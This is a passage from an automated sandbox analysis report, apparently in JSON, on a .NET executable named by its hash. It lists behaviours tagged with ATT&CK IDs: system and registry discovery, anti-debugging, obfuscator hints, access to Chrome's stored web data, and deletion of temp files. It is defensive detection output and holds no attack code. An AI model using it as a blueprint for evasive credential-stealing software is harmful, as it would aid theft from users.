\"00000409\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\SECURITY\"; Key: \"8E9F5090-2D75-4D03-8A81-E5AFBF85DAF1\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\"; Key: \"INSTALLATIONTYPE\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"HWRPORTREUSEONSOCKETBIND\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"USEHTTPPIPELININGANDBUFFERPOOLING\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"USESAFESYNCHRONOUSCLOSE\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"USESTRICTRFCINTERIMRESPONSEHANDLING\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"ALLOWDANGEROUSUNICODEDECOMPOSITIONS\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"USESTRICTIPV6ADDRESSPARSING\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"ALLOWALLURIENCODINGEXPANSION\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"SCHUSESTRONGCRYPTO\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"SCHSENDAUXRECORD\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"SYSTEMDEFAULTTLSVERSIONS\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"REQUIRECERTIFICATEEKUS\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\"; Key: \"ENABLECONSOLETRACING\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"MAXFILESIZE\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILEDIRECTORY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-135", "relevance": 1, "name": "Dotnet file contains function to dynamically call methods at runtime", "description": "Observed namespace \"System.Diagnostics\" and MemberReference \"GetMethod\" in \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" queries volume information of \"C:\\cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" at 00000000-00005916-0000010C-2778551", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c005300b82809000f00010e7255000e63006f006e00660069006700750072006100740069006f006e00000055004200570053005c0041000b00000b08550000b828090088bb08006f00630061006c005c00500072006f0067007200 (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000074010600000000000600000000000000500106001a000000982a0a00000000001a000000000000001400000000000000000000000000000000000000000000000200000288bb0800630400670000000000000000000000008000000000000000aa26008c80030a000100000000000000020000000c000000b8af0900b8af0900b3af090000000000000000000000060000000001ecef2900000000000cf6290095e1547741283700feffffff435c58775059587794000000a0000000b2af0900b0af09009400000090f12900fdfe3477180000002d2d7582c386166bc0022900 (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"IsWow64Process\" with parameter \"5916\" - (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called an API \"AdjustTokenPrivileges\"on file: C:\\Windows\\System32\\rsaenh.dll\" (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-3", "relevance": 10, "name": "Timestamp in PE header is very old or in the future", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\" claims program is from Mon Aug 29 19:20:53 2067", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" queried SystemProcessInformation at 00000000-00005916-00000105-5481489 [PID: 5916]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" queried SystemProcessInformation at 00000000-00005916-00000105-5483290 [PID: 5916]\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" queried SystemProcessInformation at 00000000-00005916-00000105-5682729 [PID: 5916]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" at 00000000-00005916-00000105-5207236", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "string-6", "type": 2, "relevance": 2, "name": "Uses a .NET obfuscator to hide its code", "description": "\"nknown compression method (0x{0:X2})\" is a hint for the obfuscator \"MPRESS\"\n \"riting with decompression is not supported.\" is a hint for the obfuscator \"MPRESS\"\n \"eading with compression is not supported.\" is a hint for the obfuscator \"MPRESS\"\n \"Compression: {0}\" is a hint for the obfuscator \"MPRESS\"\n \"Compressed: 0x{0:X}\" is a hint for the obfuscator \"MPRESS\"\n \"Uncompressed: 0x{0:X}\" is a hint for the obfuscator \"MPRESS\"\n \"nsupported compression method.\" is a hint for the obfuscator \"MPRESS\"\n \"ad read of entry {0} from compressed archive.\" is a hint for the obfuscator \"MPRESS\"\n \"ntry {0} uses an unsupported compression method (0x{1:X2}, {2})\" is a hint for the obfuscator \"MPRESS\"\n \"ompressed or Uncompressed size, or offset exceeds the maximum value. Consider setting the UseZip64WhenSaving property on the ZipFile instance.\" is a hint for the obfuscator \"MPRESS\"\n \"0}: mismatch in CompressedSize (0x{1:X16} != 0x{2:X16})\" is a hint for the obfuscator \"MPRESS\"\n \"0}: mismatch in UncompressedSize (0x{1:X16} != 0x{2:X16})\" is a hint for the obfuscator \"MPRESS\"\n \"0}: mismatch in CompressionMethod (0x{1:X4} != 0x{2:X4})\" is a hint for the obfuscator \"MPRESS\"\n \"_newlyCompressedBlob\" is a hint for the obfuscator \"MPRESS\"\n \"CompressFunc\" is a hint for the obfuscator \"MPRESS\"\n \"_latestCompressed\" is a hint for the obfuscator \"MPRESS\"\n \"compressed\" is a hint for the obfuscator \"MPRESS\"\n \"<CompressionMethod>k__BackingField\" is a hint for the obfuscator \"MPRESS\"\n \"<CompressionLevel>k__BackingField\" is a hint for the obfuscator \"MPRESS\"\n \"<SetCompression>k__BackingField\" is a hint for the obfuscator \"MPRESS\"\n \"get_CompressionMethod\" is a hint for the obfuscator \"MPRESS\"\n \"set_CompressionMethod\" is a hint for the obfuscator \"MPRESS\"\n \"get_UnsupportedCompressionMethod\" is a hint for the obfuscator \"MPRESS\"\n \"_compressionMethod\" is a hint for the obfuscator \"MPRESS\"\n \"CompressionMode\" is a hint for the obfuscator \"MPRESS\"", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 5916)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "handle-0", "type": 5, "relevance": 7, "name": "Accesses potentially sensitive information from local browsers", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" had access to \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data\" (Type: \"FileHandle\")", "origin": "Touched Handle", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD1C0.tmp.dat\" for deletion\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD460.tmp.dat\" for deletion\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD471.tmp.dat\" for deletion\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD123.tmp.tmpdb\" for deletion\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD52D.tmp.tmpdb\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access 